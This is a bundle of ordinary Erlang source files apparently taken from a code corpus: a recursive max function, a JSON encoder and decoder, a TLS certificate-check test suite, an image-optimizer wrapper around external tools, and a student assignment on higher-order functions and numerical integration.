            maxdc_tail2(TFh, max(M1, HFh), maxdc_tail2(TSh, M1, max(M2, HSh)))
    end.
%% Implement divide and conquer algorithm; Utilises erlang:max.
%% Fully recursive variant: repeatedly halves the list and takes the max of
%% the two halves' maxima.
%% NOTE(review): returns 'list is empty' (lowercase) while the other variants
%% return 'List is empty' — confirm whether this inconsistency is intentional.
maxdc2([]) ->
    'list is empty';
maxdc2([X|[]]) ->
    X;
maxdc2(L) ->
    %{Left, Right} = split2:split(L),
    {Left, Right} = lists:split(trunc(length(L)/2), L),
    max(maxdc2(Left), maxdc2(Right)). | list/search/maximum/max.erl | 0.514156 | 0.528594 | max.erl | starcoder
%% JSON - RFC 4627 - for Erlang
%%---------------------------------------------------------------------------
%% Copyright (c) 2007 <NAME> <<EMAIL>>
%% Copyright (c) 2007 LShift Ltd. <<EMAIL>>
%%
%% Permission is hereby granted, free of charge, to any person
%% obtaining a copy of this software and associated documentation
%% files (the "Software"), to deal in the Software without
%% restriction, including without limitation the rights to use, copy,
%% modify, merge, publish, distribute, sublicense, and/or sell copies
%% of the Software, and to permit persons to whom the Software is
%% furnished to do so, subject to the following conditions:
%%
%% The above copyright notice and this permission notice shall be
%% included in all copies or substantial portions of the Software.
%%
%% THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
%% EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
%% MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
%% NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
%% BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
%% ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
%% CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
%% SOFTWARE.
%%---------------------------------------------------------------------------
%%
%% encode(val()) -> str()
%% decode(str()) -> {ok, val(), str()} | {error, Reason}
%% where Reason is usually far too much information
%% and should be ignored.
%%
%% Data type mapping as per Joe Armstrong's message
%% http://www.erlang.org/ml-archive/erlang-questions/200511/msg00193.html:
%%
%% JSON Obj = type obj() = {obj, [{key(), val()}]}
%% JSON Array = type array() = [val()]
%% JSON Number = type num() = int() | float()
%% JSON String = type str() = bin()
%% JSON true false null = true, false null (atoms)
%% With Type val() = obj() | array() | num() | str() | true | false | null
%%
%% and key() being a str(). (Or a binary or atom, during JSON encoding.)
%%
%% No unicode processing is done other than minimal \uXXXX parsing and generation.
%%
%% I'm lenient in the following ways during parsing:
%% - repeated commas in arrays and objects collapse to a single comma
%% - characters =<32 or >127 that somehow appear in the input stream
%% inside a string are silently accepted unchanged
%% - any character =<32 is considered whitespace
%% - leading zeros for numbers are accepted
-module(json).
-export([mime_type/0, encode/1, encode/2, decode/1]).
-export([from_record/3, to_record/3]).
-export([hex_digit/1, digit_hex/1]).
%% @doc MIME type for JSON payloads, per RFC 4627.
mime_type() ->
    "application/json".
%% @doc Encode a val() to a JSON string (a character list). Internally the
%% output is accumulated in reverse and flipped once at the end.
encode(X) ->
    lists:reverse(encode(X, [])).

%% Encode one value, prepending its reversed JSON text onto Acc.
encode(true, Acc) ->
    "eurt" ++ Acc;
encode(false, Acc) ->
    "eslaf" ++ Acc;
encode(null, Acc) ->
    "llun" ++ Acc;
encode(Str, Acc) when is_binary(Str) ->
    quote_and_encode_string(binary_to_list(Str), Acc);
encode(Str, Acc) when is_atom(Str) ->
    %% Atoms other than true/false/null are encoded as JSON strings.
    quote_and_encode_string(atom_to_list(Str), Acc);
encode(Num, Acc) when is_number(Num) ->
    encode_number(Num, Acc);
encode({obj, Fields}, Acc) ->
    "}" ++ encode_object(Fields, "{" ++ Acc);
% Tuple case added by Ville: arbitrary tuples encode as JSON arrays.
encode(Str, Acc) when is_tuple(Str) ->
    encode(tuple_to_list(Str), Acc);
encode(Arr, Acc) when is_list(Arr) ->
    "]" ++ encode_array(Arr, "[" ++ Acc).

%% Encode the key/value pairs of an object, comma-separated.
encode_object([], Acc) ->
    Acc;
encode_object([{Key, Value}], Acc) ->
    encode_field(Key, Value, Acc);
encode_object([{Key, Value} | Rest], Acc) ->
    encode_object(Rest, "," ++ encode_field(Key, Value, Acc)).

%% Encode a single "key":value pair; keys may be binaries, atoms, or strings.
encode_field(Key, Value, Acc) when is_binary(Key) ->
    encode(Value, ":" ++ quote_and_encode_string(binary_to_list(Key), Acc));
encode_field(Key, Value, Acc) when is_atom(Key) ->
    encode(Value, ":" ++ quote_and_encode_string(atom_to_list(Key), Acc));
encode_field(Key, Value, Acc) when is_list(Key) ->
    encode(Value, ":" ++ quote_and_encode_string(Key, Acc)).

%% Encode array elements, comma-separated.
encode_array([], Acc) ->
    Acc;
encode_array([X], Acc) ->
    encode(X, Acc);
encode_array([X | Rest], Acc) ->
    encode_array(Rest, "," ++ encode(X, Acc)).
%% Wrap a string body in double quotes (quotes are added reversed, like the
%% rest of the accumulator).
quote_and_encode_string(Str, Acc) ->
    "\"" ++ encode_string(Str, "\"" ++ Acc).

%% Escape a string body character by character.
encode_string([], Acc) ->
    Acc;
encode_string([$" | Rest], Acc) ->
    encode_string(Rest, [$", $\\ | Acc]);
encode_string([$\\ | Rest], Acc) ->
    encode_string(Rest, [$\\, $\\ | Acc]);
encode_string([X | Rest], Acc) when X < 32 orelse X > 127 ->
    %% Control characters and non-ASCII become short escapes or \uXXXX.
    encode_string(Rest, encode_general_char(X, Acc));
encode_string([X | Rest], Acc) ->
    encode_string(Rest, [X | Acc]).

%% Short escapes for the common control characters; everything else is
%% emitted as \uXXXX (pushed reversed, least-significant hex digit first).
encode_general_char(8, Acc) -> [$b, $\\ | Acc];
encode_general_char(9, Acc) -> [$t, $\\ | Acc];
encode_general_char(10, Acc) -> [$n, $\\ | Acc];
encode_general_char(12, Acc) -> [$f, $\\ | Acc];
encode_general_char(13, Acc) -> [$r, $\\ | Acc];
encode_general_char(X, Acc) ->
    [hex_digit((X) band 16#F),
     hex_digit((X bsr 4) band 16#F),
     hex_digit((X bsr 8) band 16#F),
     hex_digit((X bsr 12) band 16#F),
     $u,
     $\\ | Acc].
%% Map a nibble (0..15) to its uppercase hex character; any other argument
%% fails with function_clause, like the original clause-per-digit version.
hex_digit(N) when is_integer(N), N >= 0, N =< 9 ->
    $0 + N;
hex_digit(N) when is_integer(N), N >= 10, N =< 15 ->
    $A + N - 10.
%% Render a number and prepend its reversed text onto the accumulator.
encode_number(Num, Acc) when is_integer(Num) ->
    Digits = integer_to_list(Num),
    lists:reverse(Digits, Acc);
encode_number(Num, Acc) when is_float(Num) ->
    Digits = float_to_list(Num),
    lists:reverse(Digits, Acc).
%% @doc Decode one JSON value from a string or binary. Returns
%% {ok, Value, Remaining} where Remaining is the unconsumed input after
%% trailing whitespace, or {error, Reason} on any parse failure.
decode(Bin) when is_binary(Bin) ->
    decode(binary_to_list(Bin));
decode(Chars) ->
    %% Old-style `catch`: parse failures (badmatch, function_clause,
    %% exit(syntax_error), ...) surface as {'EXIT', Reason} here.
    case catch parse(skipws(Chars)) of
        {'EXIT', Reason} ->
            %% Reason is usually far too much information, but helps
            %% if needing to debug this module.
            {error, Reason};
        {Value, Remaining} ->
            {ok, Value, skipws(Remaining)}
    end.
%% Dispatch on the first character of a value; returns {Value, Rest}.
parse([$" | Rest]) -> %% " emacs balancing
    {Str, Rest1} = parse_string(Rest, []),
    %% JSON strings become binaries.
    {list_to_binary(Str), Rest1};
parse("true" ++ Rest) -> {true, Rest};
parse("false" ++ Rest) -> {false, Rest};
parse("null" ++ Rest) -> {null, Rest};
parse([${ | Rest]) -> parse_object(skipws(Rest), []);
parse([$[ | Rest]) -> parse_array(skipws(Rest), []);
%% Anything else must be a number (or it is a syntax error).
parse(Chars) -> parse_number(Chars, []).
%% Skip leading whitespace; any character =< 32 counts as whitespace.
skipws(Input) ->
    case Input of
        [C | Rest] when C =< 32 -> skipws(Rest);
        _ -> Input
    end.
%% Consume a string body up to the closing quote, unescaping as we go.
parse_string([$" | Rest], Acc) -> %% " emacs balancing
    {lists:reverse(Acc), Rest};
parse_string([$\\, Key | Rest], Acc) ->
    parse_general_char(Key, Rest, Acc);
parse_string([X | Rest], Acc) ->
    %% Unescaped characters (including those =< 32 or > 127) pass through
    %% unchanged; this module is deliberately lenient here.
    parse_string(Rest, [X | Acc]).

%% Translate a backslash escape; \uXXXX takes exactly four hex digits and is
%% decoded to a single code point (no surrogate-pair handling).
parse_general_char($b, Rest, Acc) -> parse_string(Rest, [8 | Acc]);
parse_general_char($t, Rest, Acc) -> parse_string(Rest, [9 | Acc]);
parse_general_char($n, Rest, Acc) -> parse_string(Rest, [10 | Acc]);
parse_general_char($f, Rest, Acc) -> parse_string(Rest, [12 | Acc]);
parse_general_char($r, Rest, Acc) -> parse_string(Rest, [13 | Acc]);
parse_general_char($/, Rest, Acc) -> parse_string(Rest, [$/ | Acc]);
parse_general_char($\\, Rest, Acc) -> parse_string(Rest, [$\\ | Acc]);
parse_general_char($", Rest, Acc) -> parse_string(Rest, [$" | Acc]);
parse_general_char($u, [D0, D1, D2, D3 | Rest], Acc) ->
    parse_string(Rest, [(digit_hex(D0) bsl 12) +
                        (digit_hex(D1) bsl 8) +
                        (digit_hex(D2) bsl 4) +
                        (digit_hex(D3)) | Acc]).
%% Map a hex character (either case) to its value 0..15; any other argument
%% fails with function_clause, like the original clause-per-character version.
digit_hex(D) when D >= $0, D =< $9 ->
    D - $0;
digit_hex(D) when D >= $A, D =< $F ->
    D - $A + 10;
digit_hex(D) when D >= $a, D =< $f ->
    D - $a + 10.
%% Turn the reversed digit accumulator into an integer when possible,
%% otherwise a float. The old-style `case catch ...` has been replaced with a
%% narrow try/catch: list_to_integer/1 fails only with error:badarg, and the
%% previous version swallowed any exception class.
finish_number(Acc, Rest) ->
    Str = lists:reverse(Acc),
    Value = try
                list_to_integer(Str)
            catch
                error:badarg -> list_to_float(Str)
            end,
    {Value, Rest}.
%% Parse a JSON number; an empty input at this point is a syntax error.
parse_number([], _Acc) ->
    exit(syntax_error);
parse_number([$- | Rest], Acc) ->
    parse_number1(Rest, [$- | Acc]);
parse_number(Rest, Acc) ->
    parse_number1(Rest, Acc).

%% Integer part, optional fraction, optional exponent. Leading zeros are
%% accepted (lenient with respect to strict JSON).
parse_number1(Rest, Acc) ->
    {Acc1, Rest1} = parse_int_part(Rest, Acc),
    case Rest1 of
        [] -> finish_number(Acc1, []);
        [$. | More] ->
            {Acc2, Rest2} = parse_int_part(More, [$. | Acc1]),
            %% A fraction is already present, so the exponent form needs no
            %% synthetic ".0" inserted.
            parse_exp(Rest2, Acc2, false);
        _ ->
            parse_exp(Rest1, Acc1, true)
    end.
%% Require at least one character to be present (a bare sign or trailing dot
%% fails with function_clause, which decode/1 turns into {error, _}).
parse_int_part(Chars = [_Ch | _Rest], Acc) ->
    parse_int_part0(Chars, Acc).

%% Accumulate consecutive digits (reversed) and return the remainder.
parse_int_part0([], Acc) ->
    {Acc, []};
parse_int_part0([Ch | Rest], Acc) ->
    case is_digit(Ch) of
        true -> parse_int_part0(Rest, [Ch | Acc]);
        false -> {Acc, [Ch | Rest]}
    end.
%% Handle an optional exponent ('e' or 'E'); otherwise finish the number.
parse_exp([$e | Rest], Acc, NeedFrac) ->
    parse_exp1(Rest, Acc, NeedFrac);
parse_exp([$E | Rest], Acc, NeedFrac) ->
    parse_exp1(Rest, Acc, NeedFrac);
parse_exp(Rest, Acc, _NeedFrac) ->
    finish_number(Acc, Rest).

%% When no fraction was seen, inject ".0" so list_to_float/1 accepts the
%% final string (Erlang floats require a fractional part).
parse_exp1(Rest, Acc, NeedFrac) ->
    {Acc1, Rest1} = parse_signed_int_part(Rest, if
                                                    NeedFrac -> [$e, $0, $. | Acc];
                                                    true -> [$e | Acc]
                                                end),
    finish_number(Acc1, Rest1).

%% Exponent digits with an optional leading sign.
parse_signed_int_part([$+ | Rest], Acc) ->
    parse_int_part(Rest, [$+ | Acc]);
parse_signed_int_part([$- | Rest], Acc) ->
    parse_int_part(Rest, [$- | Acc]);
parse_signed_int_part(Rest, Acc) ->
    parse_int_part(Rest, Acc).
%% True for the ASCII decimal digit characters only; any other term
%% (including floats and non-numbers) is false, as before.
is_digit(C) when is_integer(C), C >= $0, C =< $9 ->
    true;
is_digit(_) ->
    false.
%% Accumulate "key":value members until '}'. Repeated commas collapse
%% (lenient); keys are returned as character lists.
parse_object([$} | Rest], Acc) ->
    {{obj, lists:reverse(Acc)}, Rest};
parse_object([$, | Rest], Acc) ->
    parse_object(skipws(Rest), Acc);
parse_object([$" | Rest], Acc) -> %% " emacs balancing
    {Key, Rest1} = parse_string(Rest, []),
    %% The ':' separator is asserted by the match; anything else crashes
    %% (caught by decode/1).
    [$: | Rest2] = skipws(Rest1),
    {Value, Rest3} = parse(skipws(Rest2)),
    parse_object(skipws(Rest3), [{Key, Value} | Acc]).

%% Accumulate array elements until ']'. Repeated commas collapse (lenient).
parse_array([$] | Rest], Acc) ->
    {lists:reverse(Acc), Rest};
parse_array([$, | Rest], Acc) ->
    parse_array(skipws(Rest), Acc);
parse_array(Chars, Acc) ->
    {Value, Rest} = parse(Chars),
    parse_array(skipws(Rest), [Value | Acc]).
%% @doc Convert a record tuple into an obj(), given the record's field-name
%% list; fields whose value is 'undefined' are omitted.
from_record(R, _RName, Fields) ->
    {obj, encode_record_fields(R, 2, Fields)}.
%% Walk the record's elements (starting at index 2, past the record tag) in
%% step with the field-name list, skipping 'undefined' values.
encode_record_fields(_R, _Index, []) ->
    [];
encode_record_fields(R, Index, [Field | Rest]) ->
    Tail = encode_record_fields(R, Index + 1, Rest),
    case element(Index, R) of
        undefined ->
            Tail;
        Value ->
            [{atom_to_list(Field), Value} | Tail]
    end.
%% @doc Convert an obj() back into a record tuple. Fields missing from the
%% object take their value from the corresponding position in Fallback.
to_record({obj, Values}, Fallback, Fields) ->
    list_to_tuple([element(1, Fallback) | decode_record_fields(Values, Fallback, 2, Fields)]).

%% Look up each field name (as a string key) in the object's member list;
%% fall back to the matching element of the Fallback record when absent.
decode_record_fields(_Values, _Fallback, _Index, []) ->
    [];
decode_record_fields(Values, Fallback, Index, [Field | Rest]) ->
    [case lists:keysearch(atom_to_list(Field), 1, Values) of
         {value, {_, Value}} ->
             Value;
         false ->
             element(Index, Fallback)
     end | decode_record_fields(Values, Fallback, Index + 1, Rest)]. | ringogw/src/json.erl | 0.615088 | 0.448728 | json.erl | starcoder
%% Copyright (c) 2020-2022 <NAME>
%%
%% Permission is hereby granted, free of charge, to any person obtaining a
%% copy of this software and associated documentation files (the "Software"),
%% to deal in the Software without restriction, including without limitation
%% the rights to use, copy, modify, merge, publish, distribute, sublicense,
%% and/or sell copies of the Software, and to permit persons to whom the
%% Software is furnished to do so, subject to the following conditions:
%%
%% The above copyright notice and this permission notice shall be included in
%% all copies or substantial portions of the Software.
%%
%% THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
%% IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
%% FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
%% AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
%% LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
%% FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
%% DEALINGS IN THE SOFTWARE.
-module(tls_certificate_check_options_SUITE).
-compile(export_all).
-include_lib("stdlib/include/assert.hrl").
%% ------------------------------------------------------------------
%% Macros
%% ------------------------------------------------------------------
-define(PEMS_PATH, "../../../../test/common_scenarios").
%% ------------------------------------------------------------------
%% Setup
%% ------------------------------------------------------------------
%% List of test cases run by Common Test for this suite.
all() ->
[real_certificate_test,
good_certificate_test,
expired_certificate_test,
future_certificate_test,
wrong_host_certificate_test,
self_signed_certificate_test,
unknown_ca_test,
misordered_chain_test].
%% Start the application under test (and its dependencies) once for the
%% whole suite.
init_per_suite(Config) ->
{ok, _} = application:ensure_all_started(tls_certificate_check),
Config.
%% Stop the application under test after the suite has finished.
end_per_suite(_Config) ->
ok = application:stop(tls_certificate_check).
%% ------------------------------------------------------------------
%% Test Cases
%% ------------------------------------------------------------------
%% Exercises tls_certificate_check:options/1 against live, well-known
%% HTTPS endpoints; tries the (shuffled) URLs until one succeeds.
%% NOTE(review): requires internet access at test run time.
real_certificate_test(_Config) ->
{ok, _} = application:ensure_all_started(inets),
try
URLs = shuffle_list(["https://example.com",
"https://google.com",
"https://microsoft.com"]),
real_certificate_test_recur(URLs)
after
application:stop(inets)
end.
%% Happy path: a leaf certificate chaining to the test CA bundle is
%% accepted and the TLS socket can be established.
good_certificate_test(_Config) ->
tls_certificate_check_test_utils:connect(
?PEMS_PATH, "foobar.pem",
leaf, "good_certificate.pem",
fun ({ok, Socket}) ->
ssl:close(Socket)
end).
%% A certificate past its notAfter date is rejected with
%% certificate_expired.
expired_certificate_test(_Config) ->
tls_certificate_check_test_utils:connect(
?PEMS_PATH, "foobar.pem",
leaf, "expired_certificate.pem",
fun ({error, {tls_alert, {certificate_expired, _}}}) ->
ok
end).
%% A certificate not yet within its validity period is reported as
%% certificate_expired as well (this is what the test pins down).
future_certificate_test(_Config) ->
tls_certificate_check_test_utils:connect(
?PEMS_PATH, "foobar.pem",
leaf, "future_certificate.pem",
fun ({error, {tls_alert, {certificate_expired, _}}}) ->
ok
end).
%% Hostname mismatch fails the handshake.
wrong_host_certificate_test(_Config) ->
tls_certificate_check_test_utils:connect(
?PEMS_PATH, "foobar.pem",
leaf, "wrong.host.pem", "wrong.host_key.pem",
fun ({error, {tls_alert, {handshake_failure, _}}}) ->
ok
end).
%% A self-signed certificate is rejected as bad_certificate.
self_signed_certificate_test(_Config) ->
tls_certificate_check_test_utils:connect(
?PEMS_PATH, "foobar.pem",
leaf, "self_signed.pem", "self_signed_key.pem",
fun ({error, {tls_alert, {bad_certificate, _}}}) ->
ok
end).
%% A certificate issued by a CA absent from the bundle fails with
%% unknown_ca.
unknown_ca_test(_Config) ->
tls_certificate_check_test_utils:connect(
?PEMS_PATH, "foobar.pem",
leaf, "unknown_ca.pem",
fun ({error, {tls_alert, {unknown_ca, _}}}) ->
ok
end).
%% A chain presented out of order is still accepted (the connection
%% succeeds, which is what this test asserts).
misordered_chain_test(_Config) ->
tls_certificate_check_test_utils:connect(
?PEMS_PATH, "foobar.pem",
chain, "misordered_chain.pem",
fun ({ok, Socket}) ->
ssl:close(Socket)
end).
%% ------------------------------------------------------------------
%% Internal
%% ------------------------------------------------------------------
%% Try each URL in turn: any integer HTTP status counts as success; a
%% non-TLS connection failure moves on to the next URL; running out of
%% URLs fails the test case.
real_certificate_test_recur([Url | Next]) ->
    ct:pal("Trying ~p", [Url]),
    Headers = [{"connection", "close"}],
    HttpOpts = [{ssl, tls_certificate_check:options(Url)}],
    Opts = [],
    case httpc:request(head, {Url, Headers}, HttpOpts, Opts) of
        {ok, {{_, StatusCode, _}, _, _}}
          when is_integer(StatusCode) ->
            ok;
        {error, Reason} ->
            %% `Reason' is already unwrapped from the {error, _} result
            %% above, so the pattern must not carry an extra {error, ...}
            %% wrapper -- with the wrapper the assertion could never match
            %% and therefore never fail, silently skipping TLS alerts
            %% instead of failing the test.
            ?assertNotMatch({failed_connect, [{to_address, {_, _}},
                                              {inet, [inet], {tls_alert, _}}]},
                            Reason),
            ct:pal("Failed: ~p", [Reason]),
            real_certificate_test_recur(Next)
    end;
real_certificate_test_recur([]) ->
    error('All test URLs are down (or we have no internet access)').
%% Return a random permutation of List: decorate each element with a
%% uniform random key, sort on the key, then strip the keys.
shuffle_list(List) ->
Weighed = [{rand:uniform(), V} || V <- List],
Sorted = lists:sort(Weighed),
[V || {_, V} <- Sorted]. | test/tls_certificate_check_options_SUITE.erl | 0.520984 | 0.433682 | tls_certificate_check_options_SUITE.erl | starcoder |
-module(image_optimizer).
-export([
optimize/1
, optimize/2
% hidden
, run/1
, os_find_executable/1
]).
%% Known optimizer backends; each name maps to a module called
%% image_optimizer_<name> implementing the optimize/3 callback below.
-type optimizer() :: pngquant
| optipng
| jpegoptim
| cjpeg
| jpeg_recompress
| svgo
| scour
| gifsicle.
-type options() :: [option()].
%% Options accepted by optimize/2 (individual backends may ignore some).
-type option() :: {quality, integer()}
| {use, optimizer() | [optimizer()]}
| {quiet, true | false}
| {strip_metadata, true | false}
| {output, file:filename_all()}.
%% Behaviour implemented by each image_optimizer_<name> backend module.
-callback optimize(Executable :: file:filename_all(), File :: file:filename_all(), Options :: options()) ->
{ok, Output :: file:filename_all()} | {error, Reason :: term()}.
% @equiv optimize(File, [])
optimize(File) ->
optimize(File, []).
% @doc
% Optimize an image file
% @end
-spec optimize(File :: file:filename_all(), Options :: options()) -> {ok, file:filename_all()} | {error, term()} | {error, integer(), string()}.
optimize(File, Options) ->
% Only regular files can be optimized.
case filelib:is_regular(bucs:to_string(File)) of
true ->
% Pick candidate optimizers (from the {use, _} option, `identify`,
% or the file extension); 'undefined' means unsupported format.
case optimizer(bucs:to_string(File), Options) of
undefined ->
{error, invalid_file};
Optimizers ->
% Try each candidate in order until one succeeds.
optimize(Optimizers, File, Options, {error, optimizer_not_found})
end;
false ->
{error, file_not_found}
end.
% @hidden
% Run an external command, streaming stdout and returning the combined
% output; no timeout is applied (optimizations can be slow).
run(Cmd) ->
bucos:run(Cmd, [{timeout, infinity}, stdout_on_error, display_stdout, {return, combined, all}]).
% Walk the candidate optimizer list, returning the first success; Error
% carries the most recent failure (seeded with optimizer_not_found).
optimize([], _File, _Options, Error) -> Error;
optimize([Optimizer|Rest], File, Options, Error) ->
% Each backend lives in a module named image_optimizer_<Optimizer>.
Module = bucs:to_atom(lists:flatten(io_lib:format("image_optimizer_~s", [Optimizer]))),
case find_executable(Optimizer) of
false ->
% Executable not installed/configured: try the next backend.
optimize(Rest, File, Options, Error);
AppPath ->
case bucs:apply(Module, optimize, [AppPath, File, Options], {error, optimizer_not_found}) of
{error, optimizer_not_found} ->
optimize(Rest, File, Options, Error);
NewError when element(1, NewError) == error ->
% Remember the latest error but keep trying other backends.
optimize(Rest, File, Options, NewError);
{ok, _Filename} = Ok ->
Ok
end
end.
%% Map a lower-cased image format/extension string to the ordered list of
%% optimizers to try for it; 'undefined' for unsupported formats.
optimizer(Format) ->
    Table = #{"png" => [pngquant, optipng],
              "jpeg" => [jpegoptim, cjpeg, jpeg_recompress],
              "jpg" => [jpegoptim, cjpeg, jpeg_recompress],
              "svg" => [svgo, scour],
              "gif" => [gifsicle]},
    maps:get(Format, Table, undefined).
% Decide which optimizers to try for File: an explicit {use, ...} option
% wins; otherwise detect the format via ImageMagick's `identify` when the
% 'identify' option is set, falling back to the file extension.
optimizer(File, Options) ->
case proplists:get_value(use, Options, undefined) of
undefined ->
case proplists:get_bool(identify, Options) of
true ->
case find_executable(identify) of
false ->
optimizer_by_extension(File);
Identify ->
case bucos:run({"~ts -format \"%m\" \"~ts\"", [Identify, File]}) of
{ok, Format} ->
optimizer(bucstring:lowercase(Format));
_ ->
% `identify` failed: the file is probably not an image.
undefined
end
end;
false ->
optimizer_by_extension(File)
end;
Optimizers ->
% Normalize a single optimizer atom to a one-element list.
case is_list(Optimizers) of
true ->
Optimizers;
false ->
[Optimizers]
end
end.
%% Choose optimizers from the file's extension (minus the leading dot),
%% lower-cased; 'undefined' when the file has no usable extension.
optimizer_by_extension(File) ->
    Extension = filename:extension(File),
    case Extension of
        [$. | Chars] -> optimizer(bucstring:lowercase(Chars));
        _ -> undefined
    end.
% Resolve the executable path for an optimizer: a path configured under
% {image_optimizer, Exec} takes precedence (and must actually be
% executable); otherwise fall back to searching the system PATH.
% Returns the path as a string, or 'false' when nothing usable is found.
find_executable(Exec) when is_atom(Exec) ->
    case doteki:get_env([image_optimizer, Exec], undefined) of
        undefined ->
            % Not configured: os_find_executable/1 already returns either a
            % path or 'false', so return its result directly (the previous
            % inner case was an identity re-dispatch and added nothing).
            image_optimizer:os_find_executable(bucs:to_string(Exec));
        AppPath ->
            case bucfile:is_executable(AppPath) of
                #{owner := false,
                  group := false,
                  other := false} ->
                    false;
                _ ->
                    bucs:to_string(AppPath)
            end
    end.
% @hidden
% Needed for tests
% Thin wrapper around os:find_executable/1 so tests can mock PATH lookup.
os_find_executable(Exec) ->
os:find_executable(Exec). | src/image_optimizer.erl | 0.550849 | 0.442998 | image_optimizer.erl | starcoder |
%%%--------------------------------------------------------------------------
%%% @author <NAME>
%%% @copyright (C) 2017, <COMPANY>
%%% @doc
%%%
%%% @end
%%% Created : 05. Jul 2017 12:36 AM
%%%--------------------------------------------------------------------------
-module(assign5).
-author("<NAME>").
%% API
-export([add/1, subtract/1, multiply/1, divide/1, greaterThanX/1,
lessThanX/1, derive/2, integral/4, multiplyElements/2, filterGreaterThan/2,
maxElement/1, sumElements/1, closestZero/1, myfoldl/2, foldl/2, foldr/2,
add/2, subtract/2, multiply/2, divide/2, greaterThanX/2, lessThanX/2]).
%-----------------------------------------------------------------------------
% Q1
%Curried addition: returns a fun that adds X to its argument.
add(X) ->
    fun(Y) -> Y + X end.
%Returns X + Y via the curried form.
add(X, Y) ->
    (add(X))(Y).
%Curried subtraction: returns a fun that subtracts X from its argument.
subtract(X) ->
    fun(Y) -> Y - X end.
%Returns X - Y via the curried form (the fun is built from Y and applied to X).
subtract(X, Y) ->
    F = subtract(Y),
    F(X).
%Curried multiplication: returns a fun multiplying its argument by X.
multiply(X) ->
    fun(Y) -> Y * X end.
%Returns X * Y via the curried form.
multiply(X, Y) ->
    Scale = multiply(X),
    Scale(Y).
%Curried division: returns a fun dividing its argument by X.
divide(X) ->
    fun(Y) -> Y / X end.
%Returns X / Y via the curried form (the fun is built from Y and applied to X).
divide(X, Y) ->
    Divider = divide(Y),
    Divider(X).
%Returns a function which tells if the parameter passed to the func i.e Y is greater than X.
greaterThanX(X) ->
fun(Y) -> Y > X
end.
%Tells if Y > X using the curried form of greaterThanX.  (The fun built
%from X is applied to Y, so the test performed is Y > X -- the original
%comment's claim of "X > Y" was backwards.)
greaterThanX(X, Y) -> (greaterThanX(X))(Y).
%Returns a function which tells if the parameter passed to the func i.e Y is less than X.
lessThanX(X) ->
fun(Y) -> Y < X
end.
%Tells if Y < X using the curried form of lessThanX.  (As above, the fun
%built from X is applied to Y, so the test performed is Y < X.)
lessThanX(X, Y) -> (lessThanX(X))(Y).
%--------------------------------------------------------------------------------------------
% Returns the two elements of list whose sum is closest to zero.
% NOTE(review): prints the winning pair via io:format and returns 'ok'
% (io:format's return value) rather than returning the pair itself.
closestZero([H | T]) ->
% Fold step: keep the current best pair [A, B] unless pairing A with the
% new element X yields a sum at least as close to zero (greaterThanX(P, Q)
% evaluates Q > P, so 'true' means the candidate is strictly worse).
F = fun(X, [A, B]) ->
case greaterThanX(abs(add(A,B)),abs(add(A,X))) of
true -> [A, B];
false -> [A, X]
end end,
loopClosestZero(F, [H, hd(T)], T).
% Repeatedly fold the candidate pair over ever-shorter tails until only
% one element remains, then report the best pair found.
loopClosestZero(_, [A, B], [_]) ->
io:format("Closest to Zero : ( ~w ) + ( ~w ) = ~w ~n", [A, B, A + B]);
loopClosestZero(F, Acc, T) -> loopClosestZero(F, lists:foldl(F, Acc, T), tl(T)).
%Multiply each element of list L by N.
%multiply(N) already returns a fun of arity 1, so pass it to lists:map
%directly instead of eta-expanding it through a redundant wrapper fun.
multiplyElements(L, N) ->
    lists:map(multiply(N), L).
%Filter the list L to elements greater than N.
%greaterThanX(N) already returns a predicate fun of arity 1, so pass it
%to lists:filter directly instead of wrapping it in another fun.
filterGreaterThan(L, N) ->
    lists:filter(greaterThanX(N), L).
%Returns max element of List (crashes with function_clause on []).
maxElement([First | Rest]) ->
    Pick = fun(Candidate, Best) ->
                   case greaterThanX(Best, Candidate) of
                       true -> Candidate;
                       false -> Best
                   end
           end,
    lists:foldl(Pick, First, Rest).
%Returns sum of elements of list L (0 for the empty list).
sumElements(L) ->
    lists:foldl(fun(Elem, Total) -> add(Total, Elem) end, 0, L).
%--------------------------------------------------------------------------------------------
%Returns a function computing the forward-difference approximation of
%the derivative of F, using step size H.
derive(F, H) ->
    fun(X) ->
            Rise = F(X + H) - F(X),
            Rise / H
    end.
%-------------------------------------------------------------------------------------------------------------------------%
%Returns the integral of F from A to B, using Simpson's rule.
%N is the number of subintervals; it should be even and positive for the
%rule to be valid (N = 0 crashes with badarith on the division below).
integral(A, B, N, F) -> H = (B - A) / N,
(H / 3) * (sum_Y(0, N, 0, F, A, H)).
%Accumulates the Simpson-weighted sample sum: both endpoints get weight
%1, interior odd-indexed samples weight 4, interior even-indexed samples
%weight 2.  Clause order matters: the X =:= N clause must come before the
%X =:= 0 clause so the final sample terminates the recursion.
sum_Y(N, N, Ans, F, A, H) -> Ans + F(A + N * H);
sum_Y(0, N, Ans, F, A, H) -> sum_Y(1, N, Ans + F(A), F, A, H);
sum_Y(X, N, Ans, F, A, H) ->
if
X rem 2 == 0 -> sum_Y(X + 1, N, Ans + 2 * F(A + X * H), F, A, H);
true -> sum_Y(X + 1, N, Ans + 4 * F(A + X * H), F, A, H)
end.
%-------------------------------------------------------------------------------------------------------------------------%
%foldl using foldr
%Folds a list from the left WITHOUT a separate initial accumulator: the
%first element seeds the fold, e.g. foldl(F, [A, B, C]) = F(F(A, B), C).
%Crashes on lists shorter than two elements.
foldl(F, [A, B]) -> lists:foldr(F, B, [A]);
foldl(F, L) -> F(foldl(F, lists:droplast(L)), lists:last(L)).
